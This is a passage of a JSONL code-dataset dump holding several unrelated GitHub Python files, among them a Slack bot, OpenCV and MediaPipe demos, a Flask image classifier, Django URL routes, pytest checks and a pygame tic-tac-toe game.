the given message.\n\n Args:\n received_message: The dictionary received from a Slack message event\n \"\"\"\n data = self.slack_client.api_call(\n \"reactions.add\",\n name=\"+1\",\n timestamp=received_message[\"ts\"],\n channel=received_message[\"channel\"]\n )\n assert data['ok'], data\n\n def get_userid(self):\n \"\"\"Get the userid of the logged in bot.\"\"\"\n if not self.userid:\n self.populate_identity()\n return self.userid\n\n def get_username(self):\n \"\"\"Get the username of the logged in bot.\"\"\"\n if not self.username:\n self.populate_identity()\n return self.username\n\n def populate_identity(self):\n \"\"\"Populate username and userid of the logged in bot.\"\"\"\n data = self.slack_client.api_call(\n \"auth.test\"\n )\n assert data['ok'], data\n self.userid = data['user_id']\n self.username = data['user']\n\n def get_first_message_ts(self):\n \"\"\"Get the ts of the first message sent by us in this session.\"\"\"\n return self.first_message_ts\n\n def get_current_show(self):\n \"\"\"Get the name of the show currently active on radio.\"\"\"\n try:\n r = requests.get(self.settings.rr_api + self.current_shows_uri, timeout=10.0)\n r.raise_for_status()\n except Exception as e:\n logging.exception(\"Error occurred while retrieving current show\")\n return \"Ukjent (ikke kontakt med pappagorg, eller APIet er nede)\"\n data = r.json()\n try:\n return data[\"current\"][\"title\"]\n except KeyError:\n logging.error(\"No show found when trying to obtain current show\")\n return \"Ukjent (ingen sending i 
autoavvikler)\"\n\n","repo_name":"Studentmediene/silence-notifier-slack","sub_path":"silence_notifier/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33689755744","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Soham Shah\n\n\"\"\"\nimport cv2\nimport numpy as np\ncap = cv2.VideoCapture(0)\n\nwhile(1):\n _,frame = cap.read()\n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n \n lower_red = np.array([0,120,70])\n upper_red = np.array([10,255,255])\n mask1 = cv2.inRange(hsv, lower_red, upper_red)\n \n lower_red = np.array([170,120,70])\n upper_red = np.array([180,255,255])\n \n mask2 = cv2.inRange(hsv,lower_red,upper_red)\n mask1 = mask1+mask2\n \n res = cv2.bitwise_and(frame,frame,mask=mask1)\n \n cv2.imshow('frame',frame)\n cv2.imshow('mask',mask1)\n cv2.imshow('res',res)\n k = cv2.waitKey(5) & 0xFF\n if k==27:\n break\n \ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"sohamsshah/Playing-Around-with-OpenCV","sub_path":"Computer Vision Snippets/Color_Detection.py","file_name":"Color_Detection.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"7410142376","text":"def compute_area_rectangle(width, height):\n area = width * height\n return area\ndef compute_area_square(side):\n area = compute_area_rectangle(side, side)\n return area\ndef compute_area_circle(radius):\n area = radius * radius * 3.14159\n return area\ndef compute_area(shape, value, value2 = 1):\n if shape == \"circle\":\n area = compute_area_circle(value)\n if shape == \"square\":\n area = compute_area_square(value)\n if shape == \"rectangle\":\n area = compute_area_rectangle(value, value2)\n return area\nshape = \"\"\nwhile shape != \"quit\":\n value = 0\n value2 = 0\n shape = \"\"\n while shape != \"circle\" and shape != \"square\" and shape != \"rectangle\" and shape != \"quit\":\n shape = input(\"What shape would you like to calculate the area of? 
Circle, Square, or Rectangle? (type Quit to exit)\\n-->:\").lower()\n if shape == \"circle\":\n value = float(input(\"Enter the Radius: \"))\n elif shape == \"square\":\n value = float(input(\"Enter the Side Length: \"))\n elif shape == \"rectangle\":\n value = float(input(\"Enter the First Side Length: \"))\n value2 = float(input(\"Enter the Second Side Length: \"))\n if shape != \"quit\":\n area = compute_area(shape, value, value2)\n print(f\"The area is: {area}\")","repo_name":"JoshuaMarti/Programming-Classes","sub_path":"13TTeam.py","file_name":"13TTeam.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"35157341739","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Api, Resource\nfrom keras.models import load_model\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom keras.backend import expand_dims\nfrom keras.applications.inception_v3 import preprocess_input\nimport json\nfrom PIL import Image\nimport urllib.request\nimport numpy as np\n\n\napp = Flask(__name__)\napi = Api(app)\n\nmodel = load_model('inceptionv3.h5') \n## Model loaded from keras\n# from keras.applications import InceptionV3\n# model = InceptionV3(\n# include_top=True,\n# weights=\"imagenet\",\n# classes=1000\n# )\nwith open('imagenet_class_index.json', 'r') as f:\n labels = json.load(f)\n\ndef get_image(image_url):\n with urllib.request.urlopen(image_url) as url:\n with open('temp.jpg', 'wb') as f:\n f.write(url.read())\n\ndef predict():\n image_size = (299, 299)\n img = load_img('temp.jpg', target_size=image_size)\n img_array = img_to_array(img)\n img_array = expand_dims(img_array, 0) \n img_preprocessed = preprocess_input(img_array)\n\n predictions = model.predict(img_preprocessed, steps=1)\n return predictions\n\ndef get_best_prediction(predictions, n):\n top = predictions[0].argsort()[::-1][:n]\n res = {}\n for i in top:\n res[labels[str(i)][1]] = '{:.3f}'.format(predictions[0][i])\n return res\n\n\nclass ImageClassify(Resource):\n def post(self):\n data = request.get_json()\n url = data['url']\n n = data['n']\n \n # try:\n get_image(url)\n predictions = predict()\n res = get_best_prediction(predictions, n)\n print(res)\n return jsonify({\n 'status': 200,\n 'classification': res\n })\n # except:\n # return jsonify({\n # 'status': 303,\n # 'message': 'Something went wrong. 
You may try another image'\n # })\n\napi.add_resource(ImageClassify, '/classify')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, port=7693)","repo_name":"chihuangamo/imagenet-flask-api","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"27897142028","text":"\"\"\"\nDefinition of urls for lenten.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import LoginView, LogoutView\nimport django.contrib.auth.views\n\nimport lentensermons.seeker.forms\nfrom lentensermons.seeker.views import *\n\n# Import from LENTENSERMONS as a whole\nfrom lentensermons.settings import APP_PREFIX\n\n# Other Django stuff\n# from django.core import urlresolvers\nfrom django.shortcuts import redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic.base import RedirectView\n\nadmin.autodiscover()\n\n\n# Set admin site information\nadmin.site.site_header = \"Lenten sermons\"\nadmin.site.site_title = \"lentensermons Admin\"\n\npfx = APP_PREFIX\n\nurlpatterns = [\n # Examples:\n url(r'^$', lentensermons.seeker.views.home, name='home'),\n url(r'^contact$', lentensermons.seeker.views.contact, name='contact'),\n url(r'^instruction$', lentensermons.seeker.views.instruction, name='instruction'),\n url(r'^about', lentensermons.seeker.views.about, name='about'),\n url(r'^short', lentensermons.seeker.views.about, name='short'),\n url(r'^nlogin', lentensermons.seeker.views.nlogin, name='nlogin'),\n\n url(r'^api/tagtext/', lentensermons.seeker.views.get_tributes, name='api_tributes'),\n url(r'^api/params/', lentensermons.seeker.views.get_params, name='api_params'),\n\n url(r'^location/list', LocationListView.as_view(), name='location_list'),\n url(r'^location/details(?:/(?P<pk>\\d+))?/$', LocationDetailsView.as_view(), name='location_details'),\n url(r'^location/edit(?:/(?P<pk>\\d+))?/$', LocationEdit.as_view(), name='location_edit'),\n url(r'^location/relset(?:/(?P<pk>\\d+))?/$', LocationRelset.as_view(), name='loc_relset'),\n\n url(r'^author/list', AuthorListView.as_view(), name='author_list'),\n url(r'^author/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/author/add'), name='author_add'),\n url(r'^author/view(?:/(?P<pk>\\d+))?/$', AuthorDetailsView.as_view(), name='author_details'),\n\n # url(r'^sermon/list', SermonListView.as_view(), name='sermon_list'),\n url(r'^sermon/list', SermonList.as_view(), name='sermon_list'),\n url(r'^sermon/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/sermon/add'), name='sermon_add'),\n url(r'^sermon/view(?:/(?P<pk>\\d+))?/$', SermonDetailsView.as_view(), name='sermon_details'),\n\n url(r'^collection/list', CollectionList.as_view(), name='collection_list'),\n url(r'^collection/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/sermoncollection/add'), name='collection_add'),\n url(r'^collection/view(?:/(?P<pk>\\d+))?/$', CollectionDetailsView.as_view(), name='collection_details'),\n\n url(r'^manuscript/list', ManuscriptListView.as_view(), name='manuscript_list'),\n url(r'^manuscript/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/manuscript/add'), name='manuscript_add'),\n url(r'^manuscript/view(?:/(?P<pk>\\d+))?/$', ManuscriptDetailsView.as_view(), name='manuscript_details'),\n\n url(r'^edition/list', 
EditionList.as_view(), name='edition_list'),\n url(r'^edition/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/edition/add'), name='edition_add'),\n url(r'^edition/view(?:/(?P<pk>\\d+))?/$', EditionDetailsView.as_view(), name='edition_details'),\n\n url(r'^concept/list', ConceptListView.as_view(), name='concept_list'),\n url(r'^concept/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/concept/add'), name='concept_add'),\n url(r'^concept/view(?:/(?P<pk>\\d+))?/$', ConceptDetailsView.as_view(), name='concept_details'),\n\n url(r'^tag/group/list', TgroupListView.as_view(), name='tgroup_list'),\n url(r'^tag/group/edit(?:/(?P<pk>\\d+))?/$', TgroupEdit.as_view(), name='tgroup_edit'),\n url(r'^tag/group/view(?:/(?P<pk>\\d+))?/$', TgroupDetails.as_view(), name='tgroup_details'),\n\n url(r'^tag/keyword/list', TagKeywordListView.as_view(), name='tagkeyword_list'),\n url(r'^tag/keyword/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/tagkeyword/add'), name='tagkeyw_add'),\n url(r'^tag/keyword/view(?:/(?P<pk>\\d+))?/$', TagKeywordDetailView.as_view(), name='tagkeyword_details'),\n\n url(r'^publisher/list', PublisherListView.as_view(), name='publisher_list'),\n url(r'^publisher/view(?:/(?P<pk>\\d+))?/$', PublisherDetailsView.as_view(), name='publisher_details'),\n url(r'^publisher/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/publisher/add'), name='publisher_add'),\n\n url(r'^news/list', NewsListView.as_view(), name='newsitem_list'),\n url(r'^news/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/newsitem/add'), name='newsitem_add'),\n url(r'^news/view(?:/(?P<pk>\\d+))?/$', NewsDetailsView.as_view(), name='newsitem_details'),\n\n url(r'^instruction/list', InstructionListView.as_view(), name='instruction_list'),\n url(r'^instruction/edit(?:/(?P<pk>\\d+))?/$', InstructionEdit.as_view(), name='instruction_edit'),\n url(r'^instruction/view(?:/(?P<pk>\\d+))?/$', InstructionDetails.as_view(), name='instruction_details'),\n\n url(r'^reference/list', LitrefListView.as_view(), name='litref_list'),\n url(r'^reference/view(?:/(?P<pk>\\d+))?/$', LitrefDetailsView.as_view(), name='litref_details'),\n url(r'^reference/edit(?:/(?P<pk>\\d+))?/$', LitrefEditView.as_view(), name='litref_edit'),\n\n url(r'^consulting/view(?:/(?P<pk>\\d+))?/$', ConsultingDetailsView.as_view(), name='consulting_details'),\n url(r'^consulting/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/consulting/add'), name='consulting_add'),\n\n url(r'^report/list', ReportListView.as_view(), name='report_list'),\n url(r'^report/details(?:/(?P<pk>\\d+))?/$', ReportDetailsView.as_view(), name='report_details'),\n\n # For working with ModelWidgets from the select2 package https://django-select2.readthedocs.io\n url(r'^select2/', include('django_select2.urls')),\n\n url(r'^definitions$', RedirectView.as_view(url='/'+pfx+'admin/'), name='definitions'),\n url(r'^signup/$', lentensermons.seeker.views.signup, name='signup'),\n\n url(r'^login/user/(?P<user_id>\\w[\\w\\d_]+)$', lentensermons.seeker.views.login_as_user, name='login_as'),\n\n url(r'^login/$', LoginView.as_view\n (\n template_name= 'login.html',\n authentication_form= lentensermons.seeker.forms.BootstrapAuthenticationForm,\n extra_context= {'title': 'Log in','year': datetime.now().year,}\n ),\n name='login'),\n url(r'^logout$', LogoutView.as_view(next_page=reverse_lazy('home')), name='logout'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n
 url(r'^admin/', admin.site.urls, name='admin_base'),\n]\n","repo_name":"ErwinKomen/RU-lenten","sub_path":"lenten/lentensermons/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"10312248873","text":"\"\"\"\nCustom middleware\n\"\"\"\nimport time\nimport logging\nimport re\n\nfrom django.conf import settings\n\nfrom .utils import sql_unmonitoring_this_thread\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass LongRequestMiddleware(object):\n\n \"\"\"Long request middleware; remember to put it first in the middleware list.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize the timeout from PATCHY_LONG_REQUEST_TIMEOUT, defaulting to one second\n \"\"\"\n self.ignore_url_patterns = getattr(settings, 'PATCHY_LONG_REQUEST_IGNORE_URLS', list())\n # skip any sql timeout monitoring if the long request is ignored\n self.stick_to_lr = getattr(settings, 'PATCHY_STICK_TO_LR', True)\n self.timeout = getattr(settings, 'PATCHY_LONG_REQUEST_TIMEOUT', 1)\n\n def process_request(self, request):\n \"\"\"record the time in\n \"\"\"\n self._start = time.time()\n\n self.url_matched = False\n for url_pattern in self.ignore_url_patterns:\n # if the current path is in the ignored url list, just skip it\n if re.match(url_pattern, request.path):\n self.url_matched = True\n if self.stick_to_lr:\n sql_unmonitoring_this_thread()\n break\n\n def process_response(self, request, response):\n \"\"\"record the time out\n \"\"\"\n self._end = time.time()\n elapsed = self._end - self._start\n if elapsed > self.timeout and not self.url_matched:\n # too long and log to target\n logger.error('[Long Request]Path: %s, Time: %s s' % (request.path, elapsed))\n\n response['X-ELAPSED'] = elapsed\n return response\n","repo_name":"jian-en/django-patchy","sub_path":"patchy/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
{"seq_id":"3450602353","text":"import cv2 as cv\r\nimport time\r\n#pTime=0\r\nimport mediapipe as mp\r\nclass FaceDetection():\r\n def __init__(self,minDetectionCon=0.98):\r\n self.minDetectionCon=minDetectionCon\r\n\r\n self.mpFaceDetect = mp.solutions.face_detection\r\n self.face = self.mpFaceDetect.FaceDetection(minDetectionCon)\r\n self.mpDraw = mp.solutions.drawing_utils\r\n\r\n def findFaces(self,img,draw=True):\r\n bboxs=[]\r\n imgRGB = cv.cvtColor(img, cv.COLOR_BGR2RGB)\r\n self.results = self.face.process(imgRGB)\r\n if self.results.detections:\r\n\r\n for id, detection in enumerate(self.results.detections):\r\n # mpDraw.draw_detection(img,detection)\r\n # print(detection.score)\r\n # print(detection.location_data.relative_bounding_box)\r\n bboxC = detection.location_data.relative_bounding_box\r\n h, w, c = img.shape\r\n bbox = int(bboxC.xmin * w), int(bboxC.ymin\r\n * h), \\\r\n int(bboxC.width * w), int(bboxC.height * h)\r\n img=self.fancyDraw(img,bbox) #### Even methods need to be referenced with (self)\r\n cv.putText(img, f\"conf:{int(detection.score[0] * 100)}%\", (bbox[0] - 10, bbox[1] - 10),\r\n cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)\r\n bboxs.append([id,bbox,detection.score])\r\n\r\n\r\n return img,bboxs\r\n\r\n\r\n def fancyDraw (self,img,bbox,l=30,t=10):\r\n x,y,w,h,=bbox\r\n x1,y1=x+w,y+h\r\n cv.line(img,(x,y),(x+l,y),(255,0,230),t)\r\n cv.line(img, (x1-l, y1), (x1,y1), (255, 0, 230), t)\r\n cv.rectangle(img, (bbox[0], bbox[1]), (bbox[0] + bbox[2], bbox[1] + bbox[3]), (255, 0, 255), 2)\r\n return img\r\n\r\n\r\ndef main():\r\n cap=cv.VideoCapture(0)\r\n pTime=0\r\n
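 # create the detector once, outside the loop, so it is reused for every frame\r\n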
 faceDetect=FaceDetection()\r\n\r\n while True:\r\n success,img=cap.read()\r\n img,lst=faceDetect.findFaces(img)\r\n print(lst)\r\n\r\n cTime = time.time()\r\n fps = 1 / (cTime - pTime)\r\n pTime = cTime\r\n cv.putText(img, \"fps\" + str(int(fps)), (30, 70), cv.FONT_ITALIC, 1, (0, 255, 0), 2)\r\n cv.imshow(\"img\", img)\r\n cv.waitKey(1) # speed increased\r\n#####\r\nif __name__==\"__main__\":\r\n main()","repo_name":"KatarSaad/aiProject","sub_path":"FaceModule.py","file_name":"FaceModule.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"39474590080","text":"import branch_utility\nimport unittest\nimport test_urlfetch\n\nclass BranchUtilityTest(unittest.TestCase):\n def testSplitChannelNameFromPath(self):\n self.assertEquals(('dev', 'hello/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'dev/hello/stuff.html'))\n self.assertEquals(('beta', 'hello/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'beta/hello/stuff.html'))\n self.assertEquals(('trunk', 'hello/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'trunk/hello/stuff.html'))\n self.assertEquals(('stable', 'hello/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'hello/stuff.html'))\n self.assertEquals(('stable', 'hello/dev/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'hello/dev/stuff.html'))\n\n def testGetBranchNumberForChannelName(self):\n base_path = 'branch_utility/first.json'\n self.assertEquals('1132',\n branch_utility.GetBranchNumberForChannelName('dev',\n test_urlfetch,\n base_path))\n self.assertEquals('1084',\n branch_utility.GetBranchNumberForChannelName('beta',\n test_urlfetch,\n base_path))\n self.assertEquals('1234',\n branch_utility.GetBranchNumberForChannelName('stable',\n test_urlfetch,\n base_path))\n self.assertEquals('trunk',\n branch_utility.GetBranchNumberForChannelName('trunk',\n test_urlfetch,\n base_path))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"xiaosophiawang/WProf","sub_path":"chrome/src/chrome/common/extensions/docs/server2/branch_utility_test.py","file_name":"branch_utility_test.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"}
{"seq_id":"10487370729","text":"import sph_stub\nimport numpy as np\n\ndef test_grid():\n ''' Tests if the initial grid has been populated by particles\n '''\n domain = sph_stub.SPH_main()\n domain.set_values()\n domain.initialise_grid()\n domain.place_points(domain.min_x, domain.max_x)\n domain.allocate_to_grid()\n \n x_value = []\n y_value = []\n \n for particle in domain.particle_list:\n x_value.append(particle.x[0])\n y_value.append(particle.x[1])\n\n assert len(x_value) != 0\n assert len(y_value) != 0\n\ndef test_speed():\n ''' Tests if any particles have exceeded the speed of sound\n '''\n domain = sph_stub.SPH_main()\n domain.set_values()\n\n solutions = np.load('State.npy')\n \n for log in solutions:\n for particle in log:\n #assert particle.v[0] == 0\n #assert particle.v[1] == 0\n assert particle.v[0] <= domain.c0\n assert particle.v[1] <= domain.c0\n \n \ndef test_density():\n ''' Tests if a negative density has been given and whether any\n particle density has exceeded the reference density by a factor of 1.5\n '''\n domain = sph_stub.SPH_main()\n domain.set_values()\n \n solutions = np.load('State.npy')\n \n for log in solutions:\n for particle in log: \n assert particle.rho > 0\n assert particle.rho<= 1.5 * domain.rho0\n\ndef
 test_mass_conserve():\n ''' Tests whether any particles have fallen out of the initial domain\n '''\n \n domain = sph_stub.SPH_main()\n domain.set_values()\n domain.initialise_grid()\n x_min = domain.min_x[0]\n x_max = domain.max_x[0]\n y_min = domain.min_x[1]\n y_max = domain.max_x[1]\n \n solutions = np.load('State.npy')\n \n for log in solutions:\n for particle in log:\n if particle.boundary is not True:\n assert x_min <= particle.x[0] <= x_max\n assert y_min <= particle.x[1] <= y_max\n\n ","repo_name":"olivboom/SPH-solver","sub_path":"pytest_SPH.py","file_name":"pytest_SPH.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
{"seq_id":"25847652550","text":"\"\"\"\n1. Use BFS to record the population sum, the allied countries, and their coordinates\n2. Visit a neighbour when the population difference is between l and r inclusive\n3. Pull the coordinates back out of move_q and set each cell to total population // number of countries (failed to implement this part at first)\n4. Return whether a union was formed so the caller can check it\n5. Run bfs on every country not yet visited\n if bfs returns 0 the country cannot form a union --> when the sum over all bfs calls is 0, print the number of union rounds\nhttps://chldkato.tistory.com/126\n\"\"\"\n\nfrom collections import deque\nimport sys\n\ninput = sys.stdin.readline\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\ndef bfs(x, y):\n move_q = deque()\n q.append([x, y])\n c[x][y] = 1\n people, cnt = 0, 0\n while q:\n x, y = q.popleft()\n move_q.append([x, y])\n people += a[x][y]\n cnt += 1\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < n and not c[nx][ny]:\n if l <= abs(a[x][y] - a[nx][ny]) <= r:\n c[nx][ny] = cnt\n q.append([nx, ny])\n\n while move_q:\n x, y = move_q.popleft()\n a[x][y] = people // cnt\n\n if cnt == 1:\n return 0\n return 1\n\nn, l, r = map(int, input().split())\na = [list(map(int, input().split())) for _ in range(n)]\n\nans = 0\nwhile 1:\n q = deque()\n c = [[0]*n for _ in range(n)]\n cnt = 0\n for i in range(n):\n for j in range(n):\n if not c[i][j]:\n cnt += bfs(i, j)\n if not cnt:\n break\n ans += 1\n\nprint(ans)","repo_name":"hyun-young/algorithm_study_hy","sub_path":"step-by-step/구현/boj 16234 인구 이동(참고).py","file_name":"boj 16234 인구 이동(참고).py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"7405593676","text":"from icommandlib.utils import stripshot\n\n\nclass ICommandError(Exception):\n pass\n\n\nclass IProcessTimeout(ICommandError):\n MESSAGE = \"Timed out after {timeout} seconds:\\n\\n{stripshot}\"\n\n def __init__(self, timeout, stripshot):\n self.timeout = timeout\n self.stripshot = stripshot\n\n super(IProcessTimeout, self).__init__(\n self.MESSAGE.format(\n timeout=self.timeout,\n stripshot=self.stripshot,\n )\n )\n\n\nclass IProcessExitError(ICommandError):\n def __init__(self, exit_code, screenshot):\n self.exit_code = exit_code\n self.screenshot = screenshot\n\n super(IProcessExitError, self).__init__(\n self.MESSAGE.format(\n exit_code=self.exit_code, screenshot=stripshot(self.screenshot)\n )\n )\n\n\nclass UnexpectedExit(IProcessExitError):\n MESSAGE = (\n \"Process unexpectedly exited with \"\n \"exit code {exit_code}. Output:\\n{screenshot}\"\n )\n\n\nclass AlreadyExited(IProcessExitError):\n MESSAGE = \"Process already exited with {exit_code}. \" \"Output:\\n{screenshot}\"\n\n\nclass ExitWithError(IProcessExitError):\n MESSAGE = (\n \"Process exited with non-zero exit code {exit_code}. 
\" \"Output:\\n{screenshot}\"\n )\n","repo_name":"crdoconnor/icommandlib","sub_path":"icommandlib/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"23343337961","text":"#!/usr/bin/env python\n\nimport os\n\n\ndef find_dupes(my_dir='.'):\n myfiles = set(os.listdir(my_dir))\n myfiles_lower = set()\n\n i_duplicated = 0\n for myfile in myfiles:\n lower = myfile.lower()\n if lower in myfiles_lower:\n i_duplicated += 1\n print('\\033[91m%s\\033[0m differs only by case! Change its name.' %\n myfile)\n else:\n myfiles_lower.add(lower)\n return i_duplicated\n\n\nif __name__ == \"__main__\":\n n = find_dupes()\n print(n)\n","repo_name":"Amber-MD/pytraj","sub_path":"tests/data/find_dupes.py","file_name":"find_dupes.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"79"} +{"seq_id":"70054827135","text":"import pygame\r\nfrom pygame import gfxdraw\r\npygame.init()\r\n\r\nwhite = (255, 255, 255)\r\nblack = (0, 0, 0)\r\nblue = (3, 206, 252)\r\ngreen = (0, 255, 0)\r\nred = (255, 0, 0)\r\n\r\n\r\ndisplay = pygame.display.set_mode((500, 550)) # set display size\r\npygame.display.set_caption(\"Tic Tac Toe\")\r\n\r\n\r\ndef message_display(text, color, x=80, y=525, size=32):\r\n font = pygame.font.Font('freesansbold.ttf', size) # set font\r\n text_surface = font.render(text, True, color)\r\n text_rect = text_surface.get_rect()\r\n text_rect.center = int(x), int(y)\r\n display.blit(text_surface, text_rect)\r\n\r\ndef game_loop():\r\n display.fill(white) # set display color\r\n first = pygame.draw.rect(display, blue, (0, 0, 160, 160)) # draws rectangles for buttons\r\n second = pygame.draw.rect(display, blue, (170, 0, 160, 160))\r\n third = pygame.draw.rect(display, blue, (340, 0, 160, 160))\r\n fourth = pygame.draw.rect(display, blue, (0, 170, 160, 160))\r\n fifth = pygame.draw.rect(display, blue, (170, 170, 160, 160))\r\n sixth = pygame.draw.rect(display, blue, (340, 170, 160, 160))\r\n seventh = pygame.draw.rect(display, blue, (0, 340, 160, 160))\r\n eighth = pygame.draw.rect(display, blue, (170, 340, 160, 160))\r\n ninth = pygame.draw.rect(display, blue, (340, 340, 160, 160))\r\n\r\n pygame.draw.rect(display, blue, (0, 0, 500, 15)) # draws borders\r\n pygame.draw.rect(display, blue, (0, 0, 15, 500))\r\n pygame.draw.rect(display, blue, (0, 485, 500, 15))\r\n pygame.draw.rect(display, blue, (485, 0, 15, 500))\r\n\r\n rectangles = [[first, second, third], # list of rectangles\r\n [fourth, fifth, sixth],\r\n [seventh, eighth, ninth]]\r\n\r\n board = [[' ', ' ', ' '], # list to hold game board\r\n [' ', ' ', ' '],\r\n [' ', ' ', ' ']]\r\n\r\n # anti aliased circle function\r\n def draw_circle(surface, x, y, radius, color):\r\n gfxdraw.aacircle(surface, x, y, radius, color)\r\n gfxdraw.filled_circle(surface, x, y, radius, color)\r\n\r\n \"\"\"def draw_marker(letter, rect): # draws player markers\r\n if letter == \"O\":\r\n pygame.draw.circle(display, white, (80 + rect.x, 80 + rect.y), 60)\r\n pygame.draw.circle(display, blue, (80 + rect.x, 80 + rect.y), 40)\r\n elif letter == \"X\":\r\n pygame.draw.rect(display, white, (30 + rect.x, 30 + rect.y, 100, 100))\"\"\"\r\n\r\n def draw_marker2(letter, rect):\r\n if letter == 'O':\r\n draw_circle(display, 80 + rect.x, 80 + rect.y, 60, white)\r\n draw_circle(display, 80 + rect.x, 80 + rect.y, 40, blue)\r\n elif letter == 'X':\r\n 
message_display('X', white, x=80 + rect.x, y=90 + rect.y, size=150)\r\n\r\n def draw_board():\r\n for rect_row, board_row in zip(rectangles, board):\r\n for rect, marker in zip(rect_row, board_row): # zips board positions to respective rectangles\r\n if marker == 'X': # references board list to update game display\r\n draw_marker2(\"X\", rect)\r\n elif marker == 'O':\r\n draw_marker2(\"O\", rect)\r\n\r\n def get_move(mouse_pos): # determines which rectangle was clicked\r\n for i, rect_row in enumerate(rectangles):\r\n for j, rect in enumerate(rect_row):\r\n if rect.collidepoint(mouse_pos):\r\n return i, j # returns indexes of rectangle that was clicked\r\n\r\n def winner(): # check for a winner. Only works for 3 x 3 board\r\n for row in board: # check horizontals\r\n if row[0] == row[1] == row[2] and row[0] != ' ':\r\n return row[0]\r\n\r\n for col in range(3): # check verticals\r\n if board[0][col] == board[1][col] == board[2][col] and board[0][col] != ' ':\r\n return board[0][col]\r\n\r\n if board[0][0] == board[1][1] == board[2][2] and board[0][0] != ' ': # check diagonals\r\n return board[0][0]\r\n if board[0][2] == board[1][1] == board[2][0] and board[0][2] != ' ':\r\n return board[0][2]\r\n\r\n turn_count = 0\r\n while True:\r\n\r\n pygame.time.delay(50)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n try:\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if winner() is None:\r\n pos = pygame.mouse.get_pos()\r\n row, col = get_move(pos)\r\n if board[row][col] == ' ':\r\n if turn_count % 2 == 0:\r\n player = \"X\"\r\n else:\r\n player = \"O\"\r\n board[row][col] = player\r\n turn_count += 1\r\n draw_board()\r\n except TypeError:\r\n pass\r\n if winner() is not None:\r\n message_display(f\"{winner()} wins!\", black)\r\n button(\"Play again\", green, 175, 505, 175, 40, game_loop)\r\n button(\"Quit\", red, 375, 505, 100, 40, quit_game)\r\n elif turn_count == 9:\r\n message_display(\"Tie!\", black)\r\n button(\"Play again\", green, 175, 505, 175, 40, game_loop)\r\n button(\"Quit\", red, 375, 505, 100, 40, quit_game)\r\n\r\n pygame.display.update()\r\n\r\n\r\ndef button(message, color, x, y, width, height, func=None):\r\n pos = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n\r\n pygame.draw.rect(display, color, (x, y, width, height))\r\n message_display(message, black, x + width/2, y + height/2)\r\n\r\n if x+width > pos[0] > x and y+height > pos[1] > y and click[0] == 1 and func is not None:\r\n func()\r\n\r\ndef quit_game():\r\n pygame.quit()\r\n quit()\r\n\r\ndef game_intro():\r\n while True:\r\n\r\n pygame.time.delay(50)\r\n\r\n for event in pygame.event.get():\r\n if event.type == 